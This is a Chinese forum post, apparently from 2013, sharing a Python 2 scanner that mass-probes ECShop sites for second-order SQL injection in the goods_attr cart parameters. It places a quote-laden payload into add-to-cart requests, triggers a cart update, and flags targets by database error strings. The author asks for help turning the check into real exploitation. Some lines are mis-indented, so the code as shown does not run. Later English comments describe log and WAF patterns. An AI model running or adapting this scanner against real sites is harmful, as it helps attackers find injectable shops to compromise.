鉴于好久没发帖子了,看到ecshop的goods_attr和goods_attr_id两个二次注入漏洞,于是写了这个小工具。由于不会构造语句,只能写出判断漏洞是否存在的工具了,大家海涵;有能构造出语句的,联系我,我再完善一下。

完整代码如下:

#! /usr/bin/env python2.7
#coding=utf-8
#by 少校 QQ1006079161 写入2013年8月14号深夜
#ecshop的goods_attr和goods_attr_id两个二次注入漏洞
#参考[url]https://forum.90sec.org/viewthread.php?tid=6476&highlight=ecshop[/url]
import re
import sys
import getopt
import urllib
import urllib2
import cookielib
def make_order(arg):
    """Try to add a product to the cart of the ECShop install at base URL *arg*.

    Product ids 1..24 are tried in turn (the loop stops once the counter
    reaches 25). The first id whose response contains the text ``'s1s'`` is
    treated as a successful add-to-cart, after which
    goods_attr_sqlinjection() is called on the same base URL. Any exception
    raised by the request or by the callee is printed and the scan stops.

    Defender's view: the distinguishing request is a POST to
    ``flow.php?step=add_to_cart`` whose ``goods`` parameter carries a
    ``spec`` array with a value containing a single quote; that is the
    pattern to look for in access logs or to match in a WAF rule.
    """
    print u'n当前正在检测%s' % arg
    global mdbhack  # declared global, but not referenced by the other functions on this page
    run = True
    mdbhack = 1
    url = '%s/flow.php?step=add_to_cart' % arg
    while run and mdbhack<25:# for speed only the first ids are tried; the author notes the bound can be raised
        data = '''goods={"quick":1,"spec":["163","163'"],"goods_id":%s,"number":"1","parent":0}''' % mdbhack
        # A fresh cookie jar per attempt. Installing the opener globally means the
        # plain urllib2.urlopen() calls in goods_attr_sqlinjection() reuse the same
        # session cookies, which is how the cart state carries over.
        cookiejar = cookielib.CookieJar()
        urlOpener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))
        urllib2.install_opener(urlOpener) # after install_opener, later urlopen() calls go through this opener
        try:
            httpres = urlOpener.open(url,data,timeout=5)  # passing data makes this a POST
            html = httpres.read()
            order_ok = re.search('s1s',html)  # success oracle: as written, the literal three characters 's1s'
            if order_ok:
                print u'[LOG]  自动完成订购订单!'
                goods_attr_sqlinjection(arg)
                run = False
                break
            else:
                print u'[LOG]  自动订购产品id%s失败!' % mdbhack
                mdbhack += 1
            if mdbhack == 25 and run:
                print u'[LOG]  抱歉,前25个id的产品全部订购失败,请手动检测吧!'
        except Exception,e:
            # Any request/parse error, including one raised inside
            # goods_attr_sqlinjection(), ends the scan for this target.
            print e
            run = False
            break
def goods_attr_sqlinjection(arg):
    """Probe the cart-update step for a database error after a successful add-to-cart.

    Fetches ``<arg>/flow.php`` through the cookie-carrying opener installed by
    make_order(), takes the first ``goods_number`` field name found in the
    page, then POSTs a ``step=update_cart`` request with that field set to 1.
    If the response contains one of the database-error strings below the
    target is reported as vulnerable, otherwise as not vulnerable.

    Defender's view: the only oracle here is a verbose database error echoed
    into the page. An install that does not return SQL errors to the client
    is not flagged by this check; note that hiding the error text removes the
    oracle but does not by itself fix the underlying query.
    """
    url = arg+'/flow.php'
    html = urllib2.urlopen(url).read()  # goes through the opener installed by make_order()
    good_numbers = re.findall('''name="goods_number[(.*?)]"''',html)[0]# first match only; with no match [0] raises IndexError, which propagates to the caller
    if good_numbers:
        # 'submit' holds a percent-encoded (non-UTF-8, looks like GBK) button label;
        # step=update_cart is what triggers the cart update on the server.
        data = 'goods_number%5B'+str(good_numbers)+'''%5D=1&submit=%B8%FC%D0%C2%B9%BA%CE%EF%B3%B5&step=update_cart'''
        request = urllib2.Request(url,data)
        httpres = urllib2.urlopen(request,timeout=10)
        html = httpres.read()
        # Database-error signatures used as the injection oracle.
        if re.search('server error|report:Array|You have an error|your SQL syntax|the right syntax to use near',html):
            print u'[LOG]  恭喜您存在goods_attr注入漏洞!'
        else:
       print u'[LOG]  不存在此漏洞'  # NOTE: mis-indented relative to the `else:` above; as pasted the file does not parse
def main(url,file_txt):
    """Dispatch on the CLI options: a single URL (-u) or a file of URLs (-f).

    Giving both is a usage error: the banner is printed and the process exits
    with status 1. With -f, every line of the file is stripped and handed to
    make_order(); an exception while opening or scanning is printed and the
    process exits with status 1. The file handle is never explicitly closed.
    """
    if url and file_txt:
        printerror()
        sys.exit(1)
    if url:
        make_order(url.strip())
    if file_txt:
        try:
            for url in open(file_txt,'r'):  # one target per line; blank lines are passed through as ''
                make_order(url.strip())
        except Exception,e:
            print e
            sys.exit(1)
def printerror():
    """Print the usage banner to stdout.

    The ``[email]``/``[url]`` tags inside the banner appear to be forum
    markup left over from how the post was rendered, not part of the
    original source.
    """
    print '''
     ,--^----------,--------,-----,-------^--,
     | |||||||||   `--------'     |          O ..
     `+---------------------------^----------|
       `_,-------, [email]__1006079161@QQ.com______[/email]|
         / XXXXXX /`|     /
        / XXXXXX /  `   /
       / XXXXXX /______(
      / XXXXXX /
     / XXXXXX /
    (________(    For example:
     `------'         scan.py -u [url]http://www.mdbhack.com[/url]
                      scan.py -f ecshop.txt
    '''
if __name__ == '__main__':
    # Expects exactly one option/value pair on the command line:
    # -u <url> or -f <file>. Anything else prints the banner and exits 1.
    url = None
    file_txt = None
    if len (sys.argv) == 3:
        try:
            opts, args = getopt.getopt (sys.argv[1:], "u:f:")#Assigning Parameters
        except:  # NOTE: bare except; also catches SystemExit/KeyboardInterrupt before exiting with 1
            printerror()
            sys.exit(1)
    else:
   printerror()  # NOTE: mis-indented under the `else:` above; as pasted the file does not parse
        sys.exit(1)
    for opt,arg in opts:#Traversal
        if opt == '-u':
            url = arg
        elif opt == '-f':
            file_txt = arg
    main(url,file_txt)


作者:少校 90sec